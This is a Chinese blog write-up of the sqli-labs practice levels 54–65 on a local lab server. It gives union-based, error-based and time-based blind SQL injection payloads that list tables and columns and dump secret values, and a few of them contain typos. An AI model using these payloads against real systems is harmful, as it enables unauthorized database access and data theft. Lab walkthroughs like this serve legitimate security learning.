LESS-54-55-56-57-58-59-60-61-62-63-64-65

最新推荐文章于 2024-01-15 15:22:46 发布
最新推荐文章于 2024-01-15 15:22:46 发布
阅读量653 收藏
点赞数
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44598397/article/details/89286292
版权

LESS-54
此系列主要是一个进阶的学习,将前面学到的知识进行更深次的运用。这一关我们主要考察
的依旧是字符型注入,但是只能尝试十次。所以需要在尝试的时候进行思考。如何能更少的
减少次数。这里的表名和密码等是每十次尝试后就强制进行更换。
因为已经知道了数据库名字叫做 challenges,所以我们需要知道表名 在这里插入图片描述

输入:
?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27–+
爆出了表名:dcifd0ca0t;
在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-54/
?id=-1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27dcifd0ca0t%27–+在这里插入图片描述
我们得到了所有的列,可以尝试将所有的数据进行查看,此处知道了密码在 secret_O8GE 列中,所以我们直接查看该列的内容

输入:http://127.0.0.1/sqlilabs/Less-54/?id=-1’union select 1,2,group_concat(secret_P0F0) from challenges.dcifd0ca0t--+在这里插入图片描述
LESS-55
本题与上一题的不同为闭合方式不同。在这里插入图片描述输入:http://127.0.0.1/sqlilabs/Less-55/?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘challenges’–+在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-55/?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘5d48supt0s’–+在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-55/?id=-1)%20union%20select%201,2,group_concat(secret_R35V)%20from%20challenges.5d48supt0s–+在这里插入图片描述
LESS-56
与前面2题的方式相同,只是sql不同,不做详解在这里插入图片描述
LESS-57在这里插入图片描述
这里的sql虽然没有闭合但是,前面已经有双引号的处理了。

输入:http://127.0.0.1/sqlilabs/Less-57/?id=-1"%20union%20select%201,2,group_concat(table_name)%20from information_schema.tables where table_schema=‘challenges’–+在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-57/?id=-1"%20union%20select%201,2,group_concat(column_name)%20from information_schema.columns where table_name=‘5d48supt0s’–+在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-57/?id=-1"%20union%20select%201,2,group_concat(secret_R35V)%20fromchallenges.5d48supt0s–+在这里插入图片描述
LESS-58
执行 sql 语句后,并没有返回数据库当中的数据,所以我们这里不能使用 union 联合注入,这里使用报错注入在这里插入图片描述

输入:http://127.0.0.1/sqlilabs/Less-58/?id=-1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘challenges’),0x7e))–+在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-58/?id=-1’ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘7mu71b84nt’),0x7e))–+在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-58/?id=-1’ and extractvalue(1,concat(0x7e,(select group_concat(secret_3ZLC) from challenges.7mu71b84nt),0x7e))–+在这里插入图片描述
Less-59
本题就闭合方式与上一题有所不同,不做详解在这里插入图片描述
LESS-60
也是比和方式有所不同。
在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-60/?id=-1") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.columns where table_schema=‘challenges’),0x7e))–+在这里插入图片描述
Less-61
闭合方式有些特殊在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-61/?id=-1’)) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘challenges’),0x7e))–+在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-61/?id=-1’)) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘2wdgbim8tv’),0x7e))–+在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-61/?id=-1’)) and extractvalue(1,concat(0x7e,(select group_concat(secret_G7QO) from challenges.2wdgbim8tv),0x7e))–+在这里插入图片描述
LESS-62
这里union注入和报错注入都不行在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-62/?id=1’)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))–+在这里插入图片描述
正确会很快,而出现错误会等待10秒。

LESS-63
只是闭合方式有所不同在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-63/?id=1’and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=‘challenges’,1,1))=77,0,sleep(10))–+在这里插入图片描述
LESS-64
只是闭合方式不同,不做详解在这里插入图片描述
LESS-65
只是闭合方式不同在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-65/?id=1") and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%2
7),1,1))=79,0,sleep(10))–+在这里插入图片描述

林夕林@
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
3GPP-23501-g10(中文版).pdf
07-28
4.4.7 msisdn-less-mo-sms 服务 66 4.4.8 时间敏感通信 67 4.4.8.1 概述 67 3GPP 错误!文档中没有指定样式的文字。 4 3GPP TS 23.501 V16.1.0(2019-06 年) 4.4.8.2 支持时间敏感通信的体系结构 67 5 高级功能 68 ...
sqli-labs————Less-60-65
Fly_鹏程万里
05-22 1022
Less-60payload:http://192.168.11.136/sqli-labs/Less-60?id=-1")union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0...
Sqli-labs 实战挑战注入篇 (Less54~65)
angry_program的博客
02-16 826
前言 本blog作为练习笔记, 文笔不才, 仅供参考, 不正之处望大神指正。 实战注入篇对应labs的54~75关: 与以往不同的是, 挑战篇更贴近实战。 Less-54 联合查询注入(十次限制) 接下来是很常规的操作了: 判断是整数型还是字符型注入: 当我们注入单引号的时候, 发现页面没有错误信息回显, 只是页面会变化(正常页面和错误界面): ...
sqlilabs第五十五五十六关
最新发布
m0_73248913的博客
01-15 378
想到一个办法能绕过需要用到IP池就可以(但是我没有)
sqli-labs Less-58596061(sqli-labs闯关指南 58596061
m0_54899775的博客
12-30 1352
sqli-labs Less-58596061(sqli-labs闯关指南 58596061
sqli-labs————Less-55
Fly_鹏程万里
05-22 461
Less -55源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&g..
前端大厂最新面试题-css.docx
06-06
65. 字体风格(font-style)有两个关键字,分别是italic和oblique,它们的区别是,italic是倾斜的字体风格,而oblique是倾斜的字体风格但不改变字体的形状。 66. 行高(line-height)是指文本的高度,可以使用px、...
学习Linux---不得不知的Linux命令1
08-04
26. **cat, less, more, paste**:显示文件内容,`less`和`more`支持分页浏览。 27. **crontab**:设置周期性执行的任务,如定时脚本。 28. **&**:让命令在后台运行,配合`bg`, `fg`和`Ctrl+Z`进行任务管理。 29...
Zoomla!逐浪CMS2 x3.9.6.zip
07-16
传统网页基于原生CSS呈现,高手已经在基于sass和less进行编程化样式编译。 传统网站多用ps做图展示,前沿的逐浪CMS已经早早的引入svg矢量画图技术。 传统网站图标多基于JPG/PNG/GIF等点阵图呈现,而基于Webfont的...
学习Linux---不得不知的Linux命令
08-24
#### 56. df - 显示磁盘空间使用情况 `df` 命令用于显示磁盘分区的使用情况。例如: ``` df -lh ``` #### 57. du - 查看文件或目录占用的空间 `du` 命令用于估算文件或目录占用的磁盘空间。例如: ``` du -sh ``` ...
sqli-labs Less-54555657(sqli-labs闯关指南 54555657
m0_54899775的博客
12-29 1625
sqli-labs Less-54555657(sqli-labs闯关指南 54555657
sqli-labs————Less-54(第四部分:提高部分)
Fly_鹏程万里
05-22 1041
前言在接下来的几关中将会对前面所学习的内容做一个复习,同时也会通过在复杂环境中的应用来提高注入技巧。Less-54源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xm...
sqli-labs (less-60)
kukudeshuo的博客
03-17 669
sqli-labs (less-60) 进入60关,直接输入 http://127.0.0.1/sql1/Less-60/?id=1' 页面正常,输入 http://127.0.0.1/sql1/Less-60/?id=1" 根据错误信息判断闭合方式为")–+,并且为字符型注入 因为有完整错误信息,所以这里我们使用报错注入攻击 查看当前库 http://127.0.0.1/sql1/Less-60/?id=1") and updatexml(1,concat(0x7e,(database()),0x
SQL Labs刷题补坑记录(less54-less65
weixin_30376453的博客
08-10 91
LESS54: 只有10次尝试,dump处secret key 直接union 查就可以,括号为单引号闭合 LESS55: 尝试出来闭合的方式为)括号,后面操作与54相同 LESS56: 尝试出来括号闭合方式为'),其它与54相同 LESS57: 括号闭合方式为"双引号,其他与前面相同 LESS58: 单引号报错,出错位置在limit,那么直接报错注...
sass和less(六十四)
weixin_44730244的博客
05-12 164
sass和less介绍和环境搭建 Sass和Less都属于预处理器,CSS预处理器定义了,一种新的语言,其基本思想是,用一种专门的编程语言,为CSS增了一些编程特性,如:变量、语句、函数、继承等概念。将CSS作为目标生成文件,然后开发者就只要用这种语言进行CSS的编码工作 Less: 官网地址:http://lesscss.org/ Vscode插件:Easy Less 直接在扩展安装就行 Hbuilder-x插件:工具->插件安装->安装新插件->前往插件市场安装->选择les
sqli-labs学习笔记(十四)less 54-65 挑战
闵行小鱼塘
09-23 264
继续学习sqli-labs,本篇是less 54-65,至此,sqli-labs的学习告一段落
SQLI-LAB  的 实战记录(Less 54 - Less 65)
这块盾牌有待改良
07-22 4110
Less - 54 Challenge-1 Less - 55 Challenge-2 Less - 56 Challenge-3 Less - 57 Challenge-4
sqli-labs通关大全(更新至Less60
热门推荐
箭雨镜屋
09-03 1万+
sqli-labs通关(less1~less10)_箭雨镜屋-CSDN博客 sqli-labs通关(less11~less20)_箭雨镜屋-CSDN博客 sqli-labs通关(less21~less30)_箭雨镜屋-CSDN博客
linux必学的60个命令
06-28
以下是 Linux 系统中常用的 60 个命令: 1. ls - 列出目录中的文件 2. cd - 更改当前工作目录 3. mkdir - 创建新目录 4. rmdir - 删除空目录 5. pwd - 显示当前工作目录 6. cp - 复制文件或目录 7. mv - 移动或重命名...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值